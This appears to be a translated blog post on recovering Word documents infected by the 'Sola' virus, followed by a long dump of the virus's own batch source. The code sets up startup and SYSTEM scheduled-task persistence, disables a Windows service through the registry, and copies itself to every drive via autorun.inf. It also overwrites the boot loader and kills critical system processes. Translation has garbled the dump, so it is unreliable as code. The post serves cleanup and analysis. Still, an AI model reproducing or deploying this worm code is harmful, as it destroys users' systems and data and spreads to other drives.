First, boot into a Windows PE environment and use the ZIP or RAR tool provided by PE to decompress the infected Word file. After decompression, three files appear: function.dll, Sola****.bat and ****.doc; note that all of these files carry the hidden attribute, so they will not show up unless hidden files are displayed.
It is best not to use anti-virus software to scan for and remove the virus at this stage, because the anti-virus software will quarantine the original document data together with the infected carrier file. First, back up the files (including the infected ones) to a non-system disk.
Then reinstall the system. Do not run any infected file after the system has been reinstalled. Next, use the "Death Q&A (Sola) otaku virus dedicated removal tool" in the attachment to clean each drive letter and restore the Word files in batches.
The following is the virus's batch code, reproduced for reference so that its behavior can be understood. Note that this dump has been altered by translation and line-wrapping (spaces inserted into paths, line breaks lost, some executable names mangled), so it does not reflect the original byte-for-byte. The points a cleanup should check are visible in it: it drops its files under %SystemRoot%\fonts\hidese~1, adds a Sola.vbs to the Startup folder and a Tasks.job scheduled task, disables the ShellHWDetection service through the registry, and writes an autorun.inf plus a Sola folder to every drive letter.
@ Echo offset Sola = % SystemRoot % \ fonts \ hidese ~ 1 Set setup = % SystemRoot % \ fonts \ hidese ~ 1 \ solasetupfor/F "tokens = 1" % I in ('date/t ') do set realdate = % IFOR/F "Skip = 5 tokens =" % I in ('dir % SystemRoot % \ assumer.exe ') do if/I "% J" = "assumer.exe" set date = % IIF "% 1" = "-install" Goto installif "% 1" = "- run "Goto runif" % 1 "="-tenbatsu "Goto tenbatsuif" % 1 "="-Kill "Goto killif" % 1 "="-killself "Goto killself ": checksignif "% 1" = "-USB" Start/Max .. if "% 1" = "-USB" CD solaif exist % s Ystemroot % \ fonts \ hidese ~ 1 \ Sola. sign goto open: filecopyset selfname = % 0: hideselfdate % date % MD % SystemRoot % \ fonts \ hideself... date % realdate % if not "% 1" = "-USB" type % selfname %> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. batif "% 1" = "-USB" type Sola. Bat> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. battype function. dll> % SystemRoot % \ fonts \ hidese ~ 1 \ function.exe echo on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho ws. Run "CMD/C % Sola % \ Sola. Bat-install", 0> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. signdel % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsgoto open: Install: packersetup % systemdrive % Cd % SystemRoot % \ fonts \ hidese ~ 1if exist function.exe taskkill/f/IM function.exe if exist solasetup RD/S/Q solasetupmd solasetupcd solasetupcopy .. \ function.exe function. DLL .. \ function.exe-XCD .. date % date % Type % setup % \ rar.exe> % SystemRoot % \ system32 \ rar.exe date % realdate % copy % setup % \ function. dll % Sola % \ function. dllattrib % Sola % \ function. dll + S + H + rrar-M0-EP-EP1 a % setup % \ docpack. dll % Sola % \ function. dllrar-M0-EP-EP1 % Setup % \ txtpack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ exepack. 
dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ jpgpack. dll % Sola % \ function. dlldel function.exe: mainsetupset a0001 = copyset a0002 = attribset a0003 = echoset a0005 = Shell Hardware failed> % Sola % \ task.txt for/F "tokens = 1" % I in ('findstr/I "svchost.exe "" % Sola % \ task.txt "') do set svchost = % I % a0001 % SystemRoot % \ syste M32 \ cmd.exe % Sola % \ % svchost % del % Sola % \ task.txt: tasks % a0002 % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobdate % date % Type % setup % \ Tasks. xxx> % SystemRoot % \ Tasks. jobschtasks/change/ru "nt authority \ System"/TN "tasks" & if errorlevel 1 goto taskfaildate % realdate % goto tasksuc: taskfail % homedrive % Cd "% allusersprofile %" cd "start" Menu \ Program \ Start Date % date % a0003 % on error resume NEX T> Sola. vbs % a0003 % set Ws = wscript. createobject ("wscript. shell ")> Sola. vbs % a0003 % ws. run "% Sola % \ svchost.exe/C % Sola % \ Sola. bat-run ", 0> Sola. vbs % a0001 % Sola. vbs % Sola % \ Sola. vbs % a0003 % NT> % SystemRoot % \ fonts \ hidese ~ 1 \ notasksdate % realdate %: tasksuc % a0002 % SystemRoot % \ Tasks. job + S + H + rdate % date % a0001 % setup % \ sleep.exe % SystemRoot % \ system32 \ sleep.exe date % realdate %: noautoplaynet stop "% a0005 %" % a0003 % Windows Registry Editor Version 5.00> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ ShellHWDetection]> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % "start" = DWORD: 00000004> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. regregedit/S % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. reg: End of installgoto end & if errorlevel 1 exit: End of install: runset runroot = % allusersprofile % \ Start Menu \ Program \ Start set taskroot = % SystemRoot % \ Tasks: runtimechkif not exist % Sola % \ runtime.txt echo! 50> % Sola % \ runtime.txt for/F "tokens = 1 delims =! 
"% I in (% Sola % \ runtime.txt) do set runtime = % IIF/I % runtime % Leq 0 goto virusset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt: diskchkecho on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho ws. Run "% Sola % \ svchost.exe/C % setup % \ recentinf. Bat", 0 >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsdel % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsfor % I in (c d e f g h I j k l m n o p q r s t u v w x y z) Do vol % I: & if errorlevel 1 Set % I = 1for % I in (c d e f g h I j k l m n o p q r s t u v w x Y Z) do Echo 1> % I: \ solachk1 & findstr. % I: \ solachk1 & if not errorlevel 1 del % I: \ solachk1 & findstr/C: "sola_1.0_2.0" % I: \ autorun. INF & if errorlevel 1 attrib-s-h-R % I: \ autorun. INF & copy/Y % setup % \ autorun. INF % I: \ autorun. I NF & attrib % I: \ autorun. INF + S + H + R & MD % I: \ Sola & copy/y "% setup % \ Sola. bat "% I: \ Sola. BAT & copy/y "% setup % \ function. DLL "% I: \ Sola \ function. DLL & attrib % I: \ Sola + S + H + R: turnif "% C %" = "1" vol C: & if not errorlevel 1 call % setup % \ scan. bat C: If "% d %" = "1" vol D: & if not errorlevel 1 call % setup % \ scan. bat D: If "% E %" = "1" vol E: & if not errorlevel 1 call % setup % \ scan. bat E: If "% F %" = "1" vol F: & if no T errorlevel 1 call % setup % \ scan. bat F: If "% G %" = "1" vol G: & if not errorlevel 1 call % setup % \ scan. bat G: If "% H %" = "1" vol H: & if not errorlevel 1 call % setup % \ scan. bat H: If "% I %" = "1" vol I: & if not errorlevel 1 call % setup % \ scan. bat I: If "% J %" = "1" vol J: & if not errorlevel 1 call % setup % \ scan. bat J: If "% K %" = "1" vol K: & if not errorlevel 1 call % setup % \ scan. bat K: If "% L %" = "1" vol L: & if not errorlev El 1 call % setup % \ scan. 
bat L: If "% m %" = "1" vol M: & if not errorlevel 1 call % setup % \ scan. bat M: If "% N %" = "1" vol N: & if not errorlevel 1 call % setup % \ scan. bat N: If "% o %" = "1" vol O: & if not errorlevel 1 call % setup % \ scan. bat O: If "% P %" = "1" vol P: & if not errorlevel 1 call % setup % \ scan. bat P: If "% Q %" = "1" vol Q: & if not errorlevel 1 call % setup % \ scan. bat Q: If "% R %" = "1" vol R: & if not errorlevel 1 call % Setup % \ scan. bat R: If "% S %" = "1" vol S: & if not errorlevel 1 call % setup % \ scan. bat S: If "% T %" = "1" vol T: & if not errorlevel 1 call % setup % \ scan. bat T: If "% u %" = "1" vol U: & if not errorlevel 1 call % setup % \ scan. bat U: If "% v %" = "1" Vol V: & if not errorlevel 1 call % setup % \ scan. bat V: If "% w %" = "1" vol W: & if not errorlevel 1 call % setup % \ scan. bat W: If "% x %" = "1" vol X: & if not errorlevel 1 call % setup % \ SC An. bat X: If "% Y %" = "1" vol Y: & if not errorlevel 1 call % setup % \ scan. bat Y: If "% Z %" = "1" vol Z: & if not errorlevel 1 call % setup % \ scan. 
bat Z: If "% C %" = "2" vol C: & if errorlevel 1 set C = 1if "% d %" = "2" vol D: & if errorlevel 1 set D = 1if "% E %" = "2" vol E: & if errorlevel 1 set E = 1if "% F %" = "2" vol F: & if errorlevel 1 set f = 1if "% G %" = "2" vol G: & if errorlevel 1 Set G = 1if "% H %" = "2" vol H: & if errorlevel 1 Set H = 1if "% I %" = "2" vol I: & if errorlevel 1 set I = 1if "% J %" = "2" vol J: & if errorlevel 1 Set J = 1if "% K %" = "2" vol K: & if errorlevel 1 set K = 1if "% L %" = "2" vol L: & if errorlevel 1 set L = 1if "% m %" = "2" vol M: & if errorlevel 1 Set M = 1if "% N %" = "2" vol N: & if errorlevel 1 set n = 1if "% o %" = "2" vol O: & if errorlevel 1 set O = 1if "% P %" = "2" vol P: & if errorlevel 1 Set P = 1if "% Q %" = "2" vol Q: & if errorlevel 1 Set q = 1i F "% R %" = "2" vol R: & if errorlevel 1 Set R = 1if "% S %" = "2" vol s: & if errorlevel 1 set S = 1if "% T %" = "2" vol t: & if errorlevel 1 set T = 1if "% u %" = "2" vol U: & if errorlevel 1 set U = 1if "% v %" = "2" Vol V: & if errorlevel 1 set V = 1if "% w %" = "2" vol W: & if errorlevel 1 set w = 1if "% x %" = "2" vol X: & if errorlevel 1 set X = 1if "% Y %" = "2" vol Y: & if errorlevel 1 set Y = 1if "% Z %" = "2" vol Z: & if errorlevel 1 set Z = 1if ex Ist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist "% runroot % \ Sola. vbs "copy" % Sola % \ Sola. vbs "" % runroot % \ Sola. vbs "if not exist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist % taskroot % \ Tasks. job copy % setup % \ Tasks. xxx % taskroot % \ Tasks. job & attrib % taskroot % \ Tasks. job + S + H + R & schtasks/change/ru "nt authority \ System"/TN "tasks" Sleep 2000 goto turn: End of rungoto end & if errorlevel 1 exit:: End of run: virusif not "% runtime %" = "0" Goto viruschkset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt cd "% allusersprofile % \ Start Menu \ Program \ Start" echo on error resume next> tenbatsu. vbsecho set Ws = wscript. createobject ("wscript. shell ")> tenbatsu. 
vbsecho ws. run "% Sola % \ Sola. bat-tenbatsu ", 0> tenbatsu. vbsgoto diskchk: viruschkif not exist "% allusersprofile % \ Start Menu \ Program \ Start \ tenbatsu. vbs "Goto killgoto diskchk: tenbatsu: killntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % systemdrive % \ ntld R % Sola % \ ntldrecho no ntldr> % systemdrive % \ ntldr: attrib % systemdrive % \ ntldr + S + H + R: pausesfcstart MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-PN winlogon.exe ', 0); window. close () ": killtaskmgrdel/Q/A % SystemRoot % \ system32 \ dllcache \ taskmgr.exe taskkill/f/IM taskmgr.exe & if errorlevel 1 Ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. xxx & if errorlevel 1 start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN taskmgr.exe ', 0); window. close () "& sleep 500ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. XXX: killexplorertaskkill/f/IM assumer.exe> NUL & if errorlevel 1 Ren % SystemRoot % \ system32 \ assumer.exe explorer. xxx & start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN cmder.exe ', 0); window. close () "& sleep 500ren % systemroo T % \ assumer.exe explorer. xxxstart/max % setup % \ tenbatsu. BAT: timesetsleep 661_if exist % Sola % \ killself Exit: killattrib % systemdrive % \ ntldr-s-h-recho no ntldr> % systemdrive % \ ntldr :: attrib % systemdrive % \ ntldr + S + H + rtasklist> % Sola % \ task.txt for/F "tokens = 2" % I in ('findstr/I "csrss.exe" "% sola % \ task.txt "') do ntsd-P % igoto diskchk: killself: startexplorerren % SystemRoot % \ Explorer. xxx Explorer. Exestart % SystemRoot % \ assumer.exe: backntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % Sola % \ ntldr % systemdrive % \ ntldrattrib % systemdrive % \ ntldr + S + H + R: running mgren % SystemRoot % \ system32 \ taskmgr. 
xxx taskmgr.exe: killviruscopy % setup % \ killvirus.txt % Sola % \ killvirus.txt C: cdmd ~ Installcd ~ Installrar X-hpkakenhi200601 % setup % \ solakiller.rar MSHTA "javascript: New activexobject ('wscript. shell'). Run ('C :\\~ Install \ install. bat % 1', 0); window. close () "RD/S/Q % setup % attrib % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobcd "% allusersprofile % \ Start Menu \ Program \ Start" If exist Sola. vbs del Sola. vbsif exist tenbatsu. vbs del tenbatsu. vbsstart % SystemRoot % \ system32 \ notepad.exe % Sola % \ killvirus.txt del % Sola % \ Sola. batexit: openif "% 1" = "-USB" exitgoto getname: backopenif not exist "% name %" exitcall "% name %": savefor/F "delims =: "% I in ('findstr" % code % "*. EXE ') do set packname = % IRAR-M0-EP-EP1 a "% packname %" "% name %" Echo % code %> "% packname % ": delattrib "% name %"-s-h-rdel "% name %" attrib function. DLL-s-h-rdel function. dllattrib % 0-s-h-rdel % 0 Exit: cmd program will stop there.: getnameset code = sola_2.0_12695220593667set name= .doc goto backopen: End
This article is from the "Chongqing network management" blog; please be sure to retain this source: http://023wg.blog.51cto.com/1462514/1551661
Batch recovery of .doc files that the Sola virus converted to .exe